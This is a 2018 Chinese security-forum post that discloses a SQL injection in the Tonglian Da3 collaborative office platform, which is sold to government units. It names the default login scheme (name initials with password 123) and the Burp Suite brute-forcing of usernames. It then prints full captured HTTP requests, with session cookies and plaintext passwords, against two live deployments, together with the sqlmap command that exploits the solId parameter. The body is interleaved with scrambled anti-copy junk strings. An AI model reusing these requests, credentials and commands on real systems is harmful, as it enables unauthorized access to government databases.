找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1540|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 k, \7 _8 s- Q2 b& H
' W. Z! q. d: R2 I9 \

J. s+ k9 @1 D# F# F8 H

$ K5 d; k" O0 s: Y: R 平台简介: 2 h) q2 `2 w0 N1 T9 P

1 c; e$ s6 M8 O3 W6 [5 E, c d5 ]1 |) D5 S

$ V4 m l9 Z8 E  4 {4 V! _! `5 u9 i+ Q, x5 h

$ ]( w k# z& M( j/ p6 \

0 Z" w$ o8 C& x0 f* ]3 V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 F) d% r( D. w6 g& {& |% a 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 j* B. } y( s1 K, T) p同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!6 H$ ]! f h9 t: j K2 |

, N3 E0 F; }6 D+ D- w9 i

, d" K, |( T6 p# Q1 k8 i" H   ! l5 j) ?% \7 @' Q2 {5 ~1 |- ?

$ W# h: @: F# Z/ T, _8 U$ V8 \1 r( M

2 ^9 |0 ^0 L3 e3 F0 H# |) T 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: ( x2 N% Q _3 d$ J" x

$ U/ V5 R. c3 o! p# j0 N

9 a2 z, G6 n( e: h   ( L i* ?' l& {/ m

( o( Q2 |) ]. z ], g, e

1 n7 D9 B: _6 q m. p/ I, L. O$ @- z http://1.1.1.1:7197/cap-aco/#(案例2-) - N% C6 D% @* l+ K" c

' W. @1 j4 t" S4 J

5 l# y! ]: ~9 d) L& X http://www.XXOO.com (案例1-官网网站) - t+ Z; L& S1 @) p

3 W/ A# g0 C6 X- S; m; O0 D. ]+ y

: h& e7 b, p6 W2 K+ L   0 b7 N/ Y& _5 G

2 I3 \/ G: o% H E5 a

1 p( q# D: D0 }6 X+ | 漏洞详情:5 ]! p, U5 @' b

5 k! N- J& h3 Q$ T" e3 Q

. D5 w& _* U# h$ b4 h% k  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 & I" H, K/ W- W' L

6 b+ [: \% N4 _: u3 u% m- e

$ R. h& \/ t7 A& V3 O      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( B n- s4 B9 u& r. w( j

+ P# n8 Y' A% v0 D0 \1 G5 F" T# w/ N

) u2 {, n2 N, o2 o9 n" J0 y D   1 O, X" z1 O0 h# M8 R' h

% i1 ?" ?+ U# p% S

) h' n, {- c5 E9 U& y   6 j/ Z; b# J- x

1 q- X& U# v& P4 F

" V, {% B% W: ]2 ?* w( C: P7 t status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: # v+ _& U& ^5 m {/ E g6 f

. g- ?3 n2 J( l0 B# P

5 F: W3 C8 m0 f$ b) G 1、案例1-官方网站 " o/ K1 e$ x- n$ o j2 ]7 j4 E

7 r; b* \7 {! n f4 Z

0 S- x8 D9 m2 a! |5 ~ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 8 A. ^! f0 o9 Y. O# v

1 G' M0 U% J1 W+ Y' l9 r, h! M

" F& [% W+ O; K/ B0 @6 l* s Host: www.XXOO.com 3 j( ?( O1 u7 D: u+ ?( K5 H9 a9 P

; T6 \9 c0 S6 W2 ]

& @6 \* \0 j1 c9 l: F d7 Q Proxy-Connection: Keep-Alive$ s# Z8 E3 X/ e/ I" M/ M1 M

6 t$ ]6 P* T( F6 Y0 b

4 `/ u1 C' B8 V" X5 e$ z% x, W Accept: application/json, text/javascript, */*; q=0.01 - ]8 D0 G; f$ @: w

5 T7 @$ q3 Q/ M$ i' R6 _

4 {1 e% e' I7 o+ @# [ Accept-Language: zh-CN( ^3 @; a+ w) X) R4 f i" o, c

2 G; c* q* ^, b6 P! Y c

& t4 Q. Z: o+ t8 u: i) s Content-Type: application/json, W( |$ _' p+ c4 g9 [

9 G* B9 P# T# f2 u

; R/ G4 L* T" w. T" b% X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko. g* A1 j. h. j) p

* G p) r% R j6 @0 h2 N6 k: K

/ [% V+ H+ e$ j$ { X-Requested-With: XMLHttpRequest 6 n8 E" e% H! K: L/ l3 t7 y

; {0 V2 l, {* D$ @ q

4 c" A6 H' b& N9 f6 N# \ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 # f% U% g3 c6 H, r/ E \

$ b/ F; X, |/ J7 z4 c( S- B

W. T$ C+ K8 _% V Accept-Encoding: gzip, deflate, sdch % n" |4 T; E4 t

% p# Z% H3 d& c$ ^; @5 N' k

* Y! r& [. {7 j: h0 h! k& e Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e! ^. W1 f) Z) Q3 y

; k, A- r/ C- t1 \3 q, I5 P

O, `( X- x' c2 O 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 9 s: c' |$ S+ t+ s1 B" Y

+ U9 r* A; x# m* c$ j8 q

' e- m! Q% c$ ?4 J S9 Z   / y7 i1 b* r7 Q5 W/ n; p6 m: O+ S

7 W, o. x+ u' h. o1 b: Y

# i4 s! x7 a* E: _7 C r   % m( y. O8 _+ H: S& r: x( z

; [; z: m% X; l9 K. I' R

# F. @* s% _- b/ i: z8 ?& z% i   8 r$ _7 M* {! e0 i3 ^; f. d H

* F( e+ V* D/ }9 `& R: }, E

& r0 }& d" Z! \+ F" r8 i  ' A1 q7 s# e. o' J

+ Y% z( C) o7 t' Y5 B& N5 Q

" g$ S- a4 U% e6 f  ( C: J; y' }- O

# ]+ j: W5 M9 M6 v5 A

! [- n- u. |) Y* f z- @& K 2、案例2-某天河云平台 # v) Q x+ K9 w, P N" h7 s

1 n' N+ }( J' {- W# }

/ d# a" j/ N# Z GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 n( ]4 n* b* a

! [" T1 M/ G, W

2 G6 s( V8 {9 }7 {( f Host: 1.1.1.:7197 6 F* f2 ^, L+ ~, r- J

O& t T {6 i+ c( Z, _

. K; N6 X. |5 }, R* N; v* V Accept: application/json, text/javascript, */*; q=0.013 e* c2 V! M. G4 Z- {7 l

0 i& M, @# B. V

( z! v7 L6 V7 B1 O: }# C' n X-Requested-With: XMLHttpRequest ' o% ]6 \# @8 W8 N& [9 g( o

( U- u: f7 v; t5 _3 i0 S% c

# E' C6 {- \2 J P; _8 R- k! B User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0/ S1 O: A4 |% \4 ~: t

1 r2 E2 D7 d! x

# b) {5 {- i" d- t Content-Type: application/json9 x- _. B! k. ^. y1 S

1 ^' U4 M! m. x

% K- G( f# `8 H: `$ E/ E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 E- a \( I5 d8 X# s, {6 A

6 d+ B' P1 r" K3 N

/ r1 V. B/ P2 Y4 z! t$ d Accept-Language: zh-CN,zh;q=0.8 4 |- H- z* H! Z1 s: `- Y b

, X/ X9 H x- d; G

! P: Z5 n' D( M4 ^# k/ w0 A$ b Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1* g* a! R6 M# c9 c$ R. [( i

- g1 K& X4 E* b, I$ o

' K" f. I6 ]. I' t8 f3 E9 \) Y Connection: close 8 a" |! n5 |* H( C: n, ^

; M( p& p* T6 s

/ [5 U1 [5 L/ h 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:# Q3 _9 v* z$ M1 Q T t) E8 ]6 p

, p& j& p: U% @0 J

% M+ ` b1 j1 r# F y" w   0 ^8 G% ]9 @3 K7 Q( Q

* V8 A( l9 Z. `+ a3 U9 z

. h' f1 }* _& _' F" R [6 m! y2 m3 M
; T8 M. n% ^$ l b+ ?) A' u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表